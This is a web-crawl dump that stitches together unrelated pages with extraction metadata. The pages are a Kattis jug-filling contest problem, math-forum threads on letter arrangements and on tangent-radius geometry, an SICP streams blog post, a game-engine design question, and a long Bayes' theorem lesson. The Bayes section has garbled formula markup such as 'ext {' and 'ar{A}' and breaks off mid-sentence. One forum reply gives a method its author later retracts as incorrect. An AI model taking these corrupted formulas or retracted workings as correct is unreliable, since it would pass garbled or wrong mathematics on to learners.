{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 386, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8425512313842773, "perplexity": 632.3236737944275}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-15/segments/1397609539493.17/warc/CC-MAIN-20140416005219-00620-ip-10-147-4-33.ec2.internal.warc.gz"}
https://open.kattis.com/contests/zxo7qo/problems/jughard
Hopefully Educational Rounds #1 #### Start 2019-08-08 07:20 UTC ## Hopefully Educational Rounds #1 #### End 2019-08-15 07:20 UTC The end is near! Contest is over. Not yet started. Contest is starting in -235 days 16:00:38 168:00:00 0:00:00 # Problem UJug Hard You have two empty jugs and tap that may be used to fill a jug. When filling a jug from the tap, you can only fill it completely (i.e., you cannot partially fill it to a desired level, since there are no volume measurements on the jug). You may empty either jug at any point. You may transfer water between the jugs: if transferring water from a larger jug to a smaller jug, the smaller jug will be full and there will be water left behind in the larger jug. Given the volumes of the two jugs, is it possible to have one jug with some specific volume of water? ## Input The first line contains $T$, the number of test cases ($1 \leq T \leq 100\, 000$). Each test case is composed of three integers: $a$, $b$, and $d$, where $a$ and $b$ ($1 \leq a, b \leq 10\, 000\, 000$) are the volumes of the two jugs, and $d$ is the desired volume of water to be generated. You can assume that $d \leq \max (a,b)$. ## Output For each of the $T$ test cases, output either Yes or No, depending on whether the specific volume of water can be placed in one of the two jugs. Sample Input 1 Sample Output 1 3 8 1 5 4 4 3 5 3 4 Yes No Yes
2020-03-30 23:20:38
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7417598366737366, "perplexity": 1105.4902143148606}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370497309.31/warc/CC-MAIN-20200330212722-20200331002722-00079.warc.gz"}
http://mathhelpforum.com/pre-calculus/69955-combination-letters-restrictions.html
1. combination letters with restrictions How many arrangements are there for PROBABILITIES if there are - no 2 vowels together - there is no E next to an I 2. b) These are the consonants are: P,R,B,B,L,T,S. They can be arranged in $\displaystyle \frac{7!}{(2!)}$ ways; Each of the ways creates 8 places _P_R_B_B_L_T_S_ to put the vowels. The number of places is then $\displaystyle 8 \choose 6$. The number of vowel arrangements is $\displaystyle \frac{6!}{(3!)}$ Put it together: $\displaystyle {\frac{7!}{(2!)}} {8 \choose 6}$$\displaystyle \frac{6!}{(3!)}$. a) “PROBABILITIES” the word has 13 letters but some repeat. There are $\displaystyle \frac{13!}{(3!)(2!)}$ ways to arrange this word: 3 I’s & 2 B’s. You now must find the number of ways we can have “EI”, “IE”, or “IEI” And subtract from total. 3. Arrangements with repeated letters Hello PatCal Originally Posted by PatCal How many arrangements are there for PROBABILITIES if there are - no 2 vowels together - there is no E next to an I The standard method for solving letter re-arrangements is to assume first that any repeated letters are distinguishable - so here we would call the two B's $\displaystyle B_1$ and $\displaystyle B_2$, and the three I's $\displaystyle I_1$, $\displaystyle I_2$ and $\displaystyle I_3$. Then work out the number of arrangements with all the letters different. Here that would be 13!. Finally note that because of repeated letters, there will be duplications. So we divide this total by the number of arrangements of each group of repeated letters within themselves. In the case of the 2 B's, that's 2!, and for the 3 I's, it's 3!. So the answer would be $\displaystyle \frac{13!}{2!3!}$ But we have extra restrictions, so we shall need to apply additional techniques. So, for question 1, where no two vowels are together. There are six vowels: O, A, E and three I's; and seven consonants. If no two vowels can come together, and we number the positions 1 to 13, then the vowels must occupy positions 2, 4, 6, 8, 10 and 12; and the consonants the odd-numbered positions. So, the six vowels could be arranged in their positions in 6! ways if they were all different. But, because of the duplication among the three I's we need to divide this number by 3!, the number of ways of arranging the I's among themselves. Thus the number of ways in which the vowels can be placed is $\displaystyle \frac{6!}{3!}$ Now do the consonants in a similar way, remembering to divide to take into account the duplication of the two B's. Finally, multiply the number of arrangements of the vowels by the number of arrangements of the consonants to get the total. For question 2, where there is no E next to an I. This is most easily solved by finding the number of arrangements in which an E and an I will come together and subtracting this from the overall total. So, how many ways are there of combining an I and an E into a single letter-group? Clearly, there are just two: IE or EI. Now treat this letter group as a single character, and work out how many ways there now are of arranging this in a line together with the other eleven letters, remembering to take into account the duplication that will arise because of the 2 B's and the remaining 2 I's. *See PS Subtract this from $\displaystyle \frac{13!}{2!3!}$ and you're done. Can you do it from here? *PS. Sorry, there's an additional factor to take into account. That is, the number of times the arrangement IEI occurs, because each of these will be counted twice in the above method: once where the IE group is placed in the line, and then has an I placed on its right, and once with the EI group being placed and then an I on its left. So, you need to work out how many times you'll get the combination IEI occurring, and add this back in - because we shall have taken it away twice, when once would have been correct. This number, then, is the number of arrangements of the letter-group IEI and the remaining ten letters - which this time only have B as a duplicated letter. Number of arrangements containing IEI, then, is $\displaystyle \frac{11!}{2!}$ and I make the final answer to question 2: 299,376,000 Tricky! 4. Hello, PatCal! I think I have the first part. (I'm still working on the second part.) How many arrangements are there for PROBABILITIES if there are (a) no two vowels together $\displaystyle \text{We have: }\:\underbrace{\{A,E,I,I,I,O\}}_{\text{6 vowels}} \cup \underbrace{\{B,B,L,P,R,S,T\}}_{\text{7 consonants}}$ Place the 7 consonants in a row, leaving a space before, after, and between them. . . $\displaystyle \begin{array}{ccccccccccccccc}\_ & C & \_ & C & \_ & C & \_ & C & \_ & C & \_ & C & \_ & C & \_ \end{array}$ There are: .$\displaystyle \frac{7!}{2!}$ orderings for the consonants. Place the 6 vowels in the spaces. . . There are: .$\displaystyle {8\choose6}$ choices for the six spaces. . . and there are: .$\displaystyle \frac{6!}{3!}$ orderings for the vowels. Therefore: .$\displaystyle \frac{7!}{2!}\cdot{8\choose6}\cdot \frac{6!}{3!} \:=\:2520 \cdot 28 \cdot 120 \:=\:8,\!467,\!200$ 5. Arrangements with repeated letters Hello PatCal and Soroban - My first posting was incorrect. My apologies. In question 1, the vowels don't have to be placed in positions 2, 4, 6, 8, 10 and 12, of course. They could go in any six of the eight spaces, as Soroban has said!
2018-05-24 20:32:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9839434623718262, "perplexity": 7591.20570736957}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794866772.91/warc/CC-MAIN-20180524190036-20180524210036-00407.warc.gz"}
http://mathhelpforum.com/geometry/138242-radius-point-tangency-proof.html
1. ## Radius-point of tangency proof Also, can anyone prove that the radius which shares the same point of tangency is perpendicular to the tangent line. "A tangent is perpendicular to the radius that shares the point of tangency." Thanks alot! 2. Originally Posted by lpbug Also, can anyone prove that the radius which shares the same point of tangency is perpendicular to the tangent line. "A tangent is perpendicular to the radius that shares the point of tangency." Thanks alot! Take a paper and draw the following: Let the centre of the circle be O. Let PQ be a tangent touching the circle at T. Clearly OT is a radial line (radius). If OT was not perpendicular to PQ, then we can drop a perpendicular from O onto PQ and call the foot of the perpendicular S. Thus we see that OS (the perpendicular) is shorter than OT (some other line joining O and a point on PQ). But is that possible? 3. I don't really get it... I mean, why would OS be shorter than OT? it would be longer... 4. Originally Posted by lpbug I don't really get it... I mean, why would OS be shorter than OT? it would be longer... Exactly!! If OT was not perpendicular to PQ, OS is shorter than OT. But that cannot happen! Thus OT is perpendicular to PQ 5. OH wait, so it would mean that a perpendicualr dropped from O onto any of the lines besides a tangent line would mean that it would be shorter than the radius? 6. Originally Posted by lpbug OH wait, so it would mean that a perpendicualr dropped from O onto any of the lines besides a tangent line would mean that it would be shorter than the radius? Thats a well known result. It has nothing to do with tangents. Pick any line AB and a point M not on the line. The shortest line joining M to a point on AB is a line perpendicular to AB and passing through M. 7. hmm, i do see your point now, but still, are there any way to proove this by using a two colum proof? like using numbers and stuff to prove it? 8. Originally Posted by lpbug hmm, i do see your point now, but still, are there any way to proove this by using a two colum proof? like using numbers and stuff to prove it? There is one theorem in circle. If you draw a chord AB from the point of contact (A) of the tangent to the circle, then the angle subtended by the chord at any point P on the circumference (angle APB ) is equal to the angle between chord and the tangent. Now suppose the chord AB is the diameter of the circle. Then angle APB = π/2. So the angle between AB ( i.e. radius ) and the tangent is π/2 9. Calclus makes this really easy. A line from the center $(x_0,y_0)$ to a point $(x,y)$ on the circoe Has equation $y-y_0=\frac{y-y_0}{x-x_0}(x-x_0)$. Differentiating the equatio of a circle we get : $\frac{dy}{dx}= -\frac{x-x_0}{y-y_0}$.
2016-10-26 20:57:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 4, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8193871974945068, "perplexity": 535.676296117612}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988720972.46/warc/CC-MAIN-20161020183840-00096-ip-10-171-6-4.ec2.internal.warc.gz"}
https://www.lvguowei.me/post/sicp-goodness-stream-9/
# SICP Goodness - Stream (9) Doing some exercises Do you think Computer Science equals building websites and mobile apps? Are you feeling that you are doing repetitive and not so intelligent work? Are you feeling a bit sick about reading manuals and copy-pasting code and keep poking around until it works all day long? Do you want to understand the soul of Computer Science? I’ve been quite busy with work related stuff recently and not had enough time for this series. Now I decided to continue reading and writing about SICP. To refresh my memory, I will reread the streams sections in the book. This time I find the material to be much easier for me and I see some wit that I have not noticed before.(That’s why this is a great book) One of them is the Henderson graph used to illustrate streams. Let’s first take a look at the integers stream: (define (int-from n) (cons-stream n (int-from (+ n 1)))) (define integers (int-from 1)) The dotted line means single value, and the solid line means stream. This graph is recursive, and it is so beautifully and cleverly illustrates how infinite stream works.
2020-08-14 22:46:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31027403473854065, "perplexity": 2059.208139846483}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439740343.48/warc/CC-MAIN-20200814215931-20200815005931-00097.warc.gz"}
https://gamedev.stackexchange.com/questions/124533/how-should-i-design-game-object-dependencies-between-windowing-input-and-behavi
# How should I design game object dependencies between windowing, input and behavior systems? This is my first time attempting to create a game engine. I came across a theoretical problem and would like to solve it before implementation. Right now I have a WindowSystem, which opens the window, sets the GL_CONTEXT, etc. I would like it to be responsible for all things window. Then I have another system that manages input called InputSystem. Then I have a BehaviorSystem for game object behavior. The problem: Consider a game object representing a menu where it has options to change the resolution/other graphics settings. How can I link these three systems with minimal coupling so that a Behavior script can close the window? Normally systems interact through components, but there's no component for the window. From what I've read systems shouldn't know about each other. I haven't a clue how I could go about such a scenario. • Hello and welcome to Gamedev.SE! Questions that are not game development specific, are considered offtopic. In other words, it does not take an expert in gamedev to answer this, but any programmer, thus its more suitable for stackoverflow. However, observer pattern might help. – Katu Jun 27 '16 at 6:55 • The data for your window configuration should be in a component... – Vaillancourt Jun 27 '16 at 12:27 • Aye but then is it really worth every entity having a window component? I thought about making it part of the behavior component. The window system during init will give the behavior component a reference. Every update the input system will give the behavior component a list of keys. Then you can use this right in your behavior code like "If (Keys.down['up'])" – gjh33 Jun 28 '16 at 23:08
2019-12-13 01:05:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22553525865077972, "perplexity": 1005.6022877336134}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540547536.49/warc/CC-MAIN-20191212232450-20191213020450-00140.warc.gz"}
https://au.mathematicstip.com/9232-124-bayes-theorem.html
# 12.4: Bayes Theorem In this section we concentrate on the more complex conditional probability problems we began looking at in the last section. Example 19 Suppose a certain disease has an incidence rate of 0.1% (that is, it afflicts 0.1% of the population). A test has been devised to detect this disease. The test does not produce false negatives (that is, anyone who has the disease will test positive for it), but the false positive rate is 5% (that is, about 5% of people who take the test will test positive, even though they do not have the disease). Suppose a randomly selected person takes the test and tests positive. What is the probability that this person actually has the disease? Solution There are two ways to approach the solution to this problem. One involves an important result in probability theory called Bayes' theorem. We will discuss this theorem a bit later, but for now we will use an alternative and, we hope, much more intuitive approach. Let's break down the information in the problem piece by piece. Suppose a certain disease has an incidence rate of 0.1% (that is, it afflicts 0.1% of the population). The percentage 0.1% can be converted to a decimal number by moving the decimal place two places to the left, to get 0.001. In turn, 0.001 can be rewritten as a fraction: 1/1000. This tells us that about 1 in every 1000 people has the disease. (If we wanted we could write P(disease)=0.001.) A test has been devised to detect this disease. The test does not produce false negatives (that is, anyone who has the disease will test positive for it). This part is fairly straightforward: everyone who has the disease will test positive, or alternatively everyone who tests negative does not have the disease. (We could also say P(positive | disease)=1.) The false positive rate is 5% (that is, about 5% of people who take the test will test positive, even though they do not have the disease). This is even more straightforward. Another way of looking at it is that of every 100 people who are tested and do not have the disease, 5 will test positive even though they do not have the disease. (We could also say that (P)(positive | no disease)=0.05.) Suppose a randomly selected person takes the test and tests positive. What is the probability that this person actually has the disease? Here we want to compute (P)(disease|positive). We already know that (P)(positive|disease)=1, but remember that conditional probabilities are not equal if the conditions are switched. Rather than thinking in terms of all these probabilities we have developed, let's create a hypothetical situation and apply the facts as set out above. First, suppose we randomly select 1000 people and administer the test. How many do we expect to have the disease? Since about 1/1000 of all people are afflicted with the disease, (frac{1}{1000}) of 1000 people is 1. (Now you know why we chose 1000.) Only 1 of 1000 test subjects actually has the disease; the other 999 do not. We also know that 5% of all people who do not have the disease will test positive. There are 999 disease-free people, so we would expect ((0.05)(999)=49.95) (so, about 50) people to test positive who do not have the disease. Now back to the original question, computing P(disease|positive). There are 51 people who test positive in our example (the one unfortunate person who actually has the disease, plus the 50 people who tested positive but don't). Only one of these people has the disease, so P(disease | positive) (approx frac{1}{51} approx 0.0196) or less than 2%. Does this surprise you? This means that of all people who test positive, over 98% do not have the disease. The answer we got was slightly approximate, since we rounded 49.95 to 50. We could redo the problem with 100,000 test subjects, 100 of whom would have the disease and ((0.05)(99,900)=4995) test positive but do not have the disease, so the exact probability of having the disease if you test positive is P(disease | positive) (approx frac{100}{5095} approx 0.0196) which is pretty much the same answer. But back to the surprising result. Of all people who test positive, over 98% do not have the disease. If your guess for the probability a person who tests positive has the disease was wildly different from the right answer (2%), don't feel bad. The exact same problem was posed to doctors and medical students at the Harvard Medical School 25 years ago and the results revealed in a 1978 New England Journal of Medicine article. Only about 18% of the participants got the right answer. Most of the rest thought the answer was closer to 95% (perhaps they were misled by the false positive rate of 5%). So at least you should feel a little better that a bunch of doctors didn't get the right answer either (assuming you thought the answer was much higher). But the significance of this finding and similar results from other studies in the intervening years lies not in making math students feel better but in the possibly catastrophic consequences it might have for patient care. If a doctor thinks the chances that a positive test result nearly guarantees that a patient has a disease, they might begin an unnecessary and possibly harmful treatment regimen on a healthy patient. Or worse, as in the early days of the AIDS crisis when being HIV-positive was often equated with a death sentence, the patient might take a drastic action and commit suicide. As we have seen in this hypothetical example, the most responsible course of action for treating a patient who tests positive would be to counsel the patient that they most likely do not have the disease and to order further, more reliable, tests to verify the diagnosis. One of the reasons that the doctors and medical students in the study did so poorly is that such problems, when presented in the types of statistics courses that medical students often take, are solved by use of Bayes' theorem, which is stated as follows: Bayes’ Theorem (P(A | B)=frac{P(A) P(B | A)}{P(A) P(B | A)+P(ar{A}) P(B | ar{A})}) In our earlier example, this translates to (P( ext { disease } | ext { positive })=frac{P( ext { disease }) P( ext { positive } | ext { disease })}{P( ext { disease }) P( ext { positive } | ext { disease })+P( ext { no disease }) P( ext { positive } | ext { no disease })}) Plugging in the numbers gives (P( ext { disease } | ext { positive })=frac{(0.001)(1)}{(0.001)(1)+(0.999)(0.05)} approx 0.0196) which is exactly the same answer as our original solution. The problem is that you (or the typical medical student, or even the typical math professor) are much more likely to be able to remember the original solution than to remember Bayes' theorem. Psychologists, such as Gerd Gigerenzer, author of Calculated Risks: How to Know When Numbers Deceive You, have advocated that the method involved in the original solution (which Gigerenzer calls the method of "natural frequencies") be employed in place of Bayes' Theorem. Gigerenzer performed a study and found that those educated in the natural frequency method were able to recall it far longer than those who were taught Bayes' theorem. When one considers the possible life-and-death consequences associated with such calculations it seems wise to heed his advice. Example 20 A certain disease has an incidence rate of 2%. If the false negative rate is 10% and the false positive rate is 1%, compute the probability that a person who tests positive actually has the disease. Solution Imagine 10,000 people who are tested. Of these 10,000, 200 will have the disease; 10% of them, or 20, will test negative and the remaining 180 will test positive. Of the 9800 who do not have the disease, 98 will test positive. So of the 278 total people who test positive, 180 will have the disease. Thus (P( ext { disease } | ext { positive })=frac{180}{278} approx 0.647) so about 65% of the people who test positive will have the disease. Using Bayes theorem directly would give the same result: (P( ext { disease } | ext { positive })=frac{(0.02)(0.90)}{(0.02)(0.90)+(0.98)(0.01)}=frac{0.018}{0.0278} approx 0.647) Try it Now 5 A certain disease has an incidence rate of 0.5%. If there are no false negatives and if the false positive rate is 3%, compute the probability that a person who tests positive actually has the disease. Out of 100,000 people, 500 would have the disease. Of those, all 500 would test positive. Of the 99,500 without the disease, 2,985 would falsely test positive and the other 96,515 would test negative. (mathrm{P}( ext { disease } | ext { positive })=frac{500}{500+2985}=frac{500}{3485} approx 14.3 \%) ## Frequently Asked Bayesian Statistics Interview Questions and Answers One of the most useful discoveries in the probability and statistics is the Bayesian statistics . The development of this decision theory has immensely increased the power of decision-making and solved many issues faced with frequentist statistics. The Bayes theorem of Bayesian Statistics often goes by different names such as posterior statistics, inverse probability, or revised probability. Although the development of Bayesian method has divided data scientists in two group – Bayesians and frequentists but the importance of Bayes theorem are unmatched. In some uncertain instances, it’s not possible to come to a conclusion without Bayesian. Hence, if you are looking forward to becoming a data scientist, machine learning engineer, or data engineer, Bayesian statistics is an important concept to learn. Knowing what is Bayesian statistics , how it works, and all the essential aspects of the topic are the key to clearing the interview process. Therefore, we’ve created a simple guide containing crucial interview questions based on Bayes theorem . Briefly study these questions and answers to perform well in your machine-learning interview. ## Contents Bayes' theorem is stated mathematically as the following equation: [3] ### Proof Edit #### For events Edit Bayes' theorem may be derived from the definition of conditional probability: where P ( A ∩ B ) is the joint probability of both A and B being true. Because #### For continuous random variables Edit For two continuous random variables X and Y, Bayes' theorem may be analogously derived from the definition of conditional density: ### Drug testing Edit Suppose, a particular test for whether someone has been using cannabis is 90% sensitive, meaning the true positive rate (TPR)=0.90. Therefore it leads to 90% true positive results (correct identification of drug use) for cannabis users. The test is also 80% specific, meaning true negative rate (TNR)=0.80. Therefore the test correctly identifies 80% of non-use for non-users, but also generates 20% false positives, or false positive rate (FPR)=0.20, for non-users. Assuming 0.05 prevalence, meaning 5% of people use cannabis, what is the probability that a random person who tests positive is really a cannabis user? The Positive predictive value (PPV) of a test is the proportion of persons who are actually positive out of all those testing positive, and can be calculated from a sample as: PPV = True positive / Tested positive The fact that P ( Positive ) = P ( Positive ∣ User ) P ( User ) + P ( Positive ∣ Non-user ) P ( Non-user ) >)=P(< ext>mid < ext>)P(< ext>)+P(< ext>mid < ext>)P(< ext>)> is a direct application of the Law of Total Probability. In this case, it says that the probability that someone tests positive is the probability that a user tests positive, times the probability of being a user, plus the probability that a non-user tests positive, times the probability of being a non-user. This is true because the classifications user and non-user form a partition of a set, namely the set of people who take the drug test. This combined with the definition of conditional probability results in the above statement. Even if someone tests positive, the probability they are a cannabis user is only 19%, because in this group only 5% of people are users, most positives are false positives coming from the remaining 95%. If 1,000 people were tested: • 950 are non-users and 190 of them give false positive (0.20 × 950) • 50 of them are users and 45 of them give true positive (0.90 × 50) The 1,000 people thus yields 235 positive tests, of which only 45 are genuine drug users, about 19%. See Figure 1 for an illustration using a frequency box, and note how small the pink area of true positives is compared to the blue area of false positives. #### Sensitivity or specificity Edit The importance of specificity can be seen by showing that even if sensitivity is raised to 100% and specificity remains at 80%, the probability of someone testing positive really being a cannabis user only rises from 19% to 21%, but if the sensitivity is held at 90% and the specificity is increased to 95%, the probability rises to 49%. ### Cancer rate Edit Even if 100% of patients with pancreatic cancer have a certain symptom, when someone has the same symptom, it does not mean that this person has a 100% chance of getting pancreatic cancer. Assume the incidence rate of pancreatic cancer is 1/100000, while 10/100000 healthy individuals have the same symptoms worldwide, the probability of having pancreatic cancer given the symptoms is only 9.1%, and the other 90.9% could be "false positives" (that is, falsely said to have cancer "positive" is a confusing term when, as here, the test gives bad news). Based on incidence rate, the following table presents the corresponding numbers per 100,000 people. Which can then be used to calculate the probability of having cancer when you have the symptoms: ### Defective item rate Edit A factory produces an item using three machines—A, B, and C—which account for 20%, 30%, and 50% of its output, respectively. Of the items produced by machine A, 5% are defective similarly, 3% of machine B's items and 1% of machine C's are defective. If a randomly selected item is defective, what is the probability it was produced by machine C? Once again, the answer can be reached without using the formula by applying the conditions to a hypothetical number of cases. For example, if the factory produces 1,000 items, 200 will be produced by Machine A, 300 by Machine B, and 500 by Machine C. Machine A will produce 5% × 200 = 10 defective items, Machine B 3% × 300 = 9, and Machine C 1% × 500 = 5, for a total of 24. Thus, the likelihood that a randomly selected defective item was produced by machine C is 5/24 ( This problem can also be solved using Bayes' theorem: Let Xi denote the event that a randomly chosen item was made by the i th machine (for i = A,B,C). Let Y denote the event that a randomly chosen item is defective. Then, we are given the following information: If the item was made by the first machine, then the probability that it is defective is 0.05 that is, P(Y | XA) = 0.05. Overall, we have To answer the original question, we first find P(Y). That can be done in the following way: Hence, 2.4% of the total output is defective. We are given that Y has occurred, and we want to calculate the conditional probability of XC. By Bayes' theorem, Given that the item is defective, the probability that it was made by machine C is 5/24. Although machine C produces half of the total output, it produces a much smaller fraction of the defective items. Hence the knowledge that the item selected was defective enables us to replace the prior probability P(XC) = 1/2 by the smaller posterior probability P(XC | Y) = 5/24. The interpretation of Bayes' rule depends on the interpretation of probability ascribed to the terms. The two main interpretations are described below. Figure 2 shows a geometric visualization similar to Figure 1. Gerd Gigerenzer and co-authors have pushed hard for teaching Bayes Rule this way, with special emphasis on teaching it to physicians. [4] An example is Will Kurt's webpage, "Bayes' Theorem with Lego," later turned into the book, Bayesian Statistics the Fun Way: Understanding Statistics and Probability with Star Wars, LEGO, and Rubber Ducks. Zhu and Gigerenzer found in 2006 that whereas 0% of 4th, 5th, and 6th-graders could solve word problems after being taught with formulas, 19%, 39%, and 53% could after being taught with frequency boxes, and that the learning was either thorough or zero. [5] ### Bayesian interpretation Edit In the Bayesian (or epistemological) interpretation, probability measures a "degree of belief". Bayes' theorem links the degree of belief in a proposition before and after accounting for evidence. For example, suppose it is believed with 50% certainty that a coin is twice as likely to land heads than tails. If the coin is flipped a number of times and the outcomes observed, that degree of belief will probably rise or fall, but might even remain the same, depending on the results. For proposition A and evidence B, • P (A), the prior, is the initial degree of belief in A. • P (A | B), the posterior, is the degree of belief after incorporating news that B is true. • the quotient P(B | A) / P(B) represents the support B provides for A. For more on the application of Bayes' theorem under the Bayesian interpretation of probability, see Bayesian inference. ### Frequentist interpretation Edit In the frequentist interpretation, probability measures a "proportion of outcomes". For example, suppose an experiment is performed many times. P(A) is the proportion of outcomes with property A (the prior) and P(B) is the proportion with property B. P(B | A) is the proportion of outcomes with property B out of outcomes with property A, and P(A | B) is the proportion of those with A out of those with B (the posterior). The role of Bayes' theorem is best visualized with tree diagrams such as Figure 3. The two diagrams partition the same outcomes by A and B in opposite orders, to obtain the inverse probabilities. Bayes' theorem links the different partitionings. #### Example Edit An entomologist spots what might, due to the pattern on its back, be a rare subspecies of beetle. A full 98% of the members of the rare subspecies have the pattern, so P(Pattern | Rare) = 98%. Only 5% of members of the common subspecies have the pattern. The rare subspecies is 0.1% of the total population. How likely is the beetle having the pattern to be rare: what is P(Rare | Pattern)? From the extended form of Bayes' theorem (since any beetle is either rare or common), ### Events Edit #### Simple form Edit For events A and B, provided that P(B) ≠ 0, In many applications, for instance in Bayesian inference, the event B is fixed in the discussion, and we wish to consider the impact of its having been observed on our belief in various possible events A. In such a situation the denominator of the last expression, the probability of the given evidence B, is fixed what we want to vary is A. Bayes' theorem then shows that the posterior probabilities are proportional to the numerator, so the last equation becomes: In words, the posterior is proportional to the prior times the likelihood. [6] If events A1, A2, . are mutually exclusive and exhaustive, i.e., one of them is certain to occur but no two can occur together, we can determine the proportionality constant by using the fact that their probabilities must add up to one. For instance, for a given event A, the event A itself and its complement ¬A are exclusive and exhaustive. Denoting the constant of proportionality by c we have Adding these two formulas we deduce that 1 = c ⋅ ( P ( B | A ) ⋅ P ( A ) + P ( B | ¬ A ) ⋅ P ( ¬ A ) ) , #### Alternative form Edit Another form of Bayes' theorem for two competing statements or hypotheses is: For an epistemological interpretation: For proposition A and evidence or background B, [7] • P ( A ) is the prior probability, the initial degree of belief in A. • P ( ¬ A ) is the corresponding initial degree of belief in not-A, that A is false, where P ( ¬ A ) = 1 − P ( A ) • P ( B | A ) is the conditional probability or likelihood, the degree of belief in B given that proposition A is true. • P ( B | ¬ A ) is the conditional probability or likelihood, the degree of belief in B given that proposition A is false. • P ( A | B ) is the posterior probability, the probability of A after taking into account B. #### Extended form Edit Often, for some partition <Aj> of the sample space, the event space is given in terms of P(Aj) and P(B | Aj). It is then useful to compute P(B) using the law of total probability: In the special case where A is a binary variable: ### Random variables Edit Consider a sample space Ω generated by two random variables X and Y. In principle, Bayes' theorem applies to the events A = <X = x> and B = <Y = y>. However, terms become 0 at points where either variable has finite probability density. To remain useful, Bayes' theorem must be formulated in terms of the relevant densities (see Derivation). #### Simple form Edit If X is continuous and Y is discrete, If X is discrete and Y is continuous, If both X and Y are continuous, #### Extended form Edit A continuous event space is often conceptualized in terms of the numerator 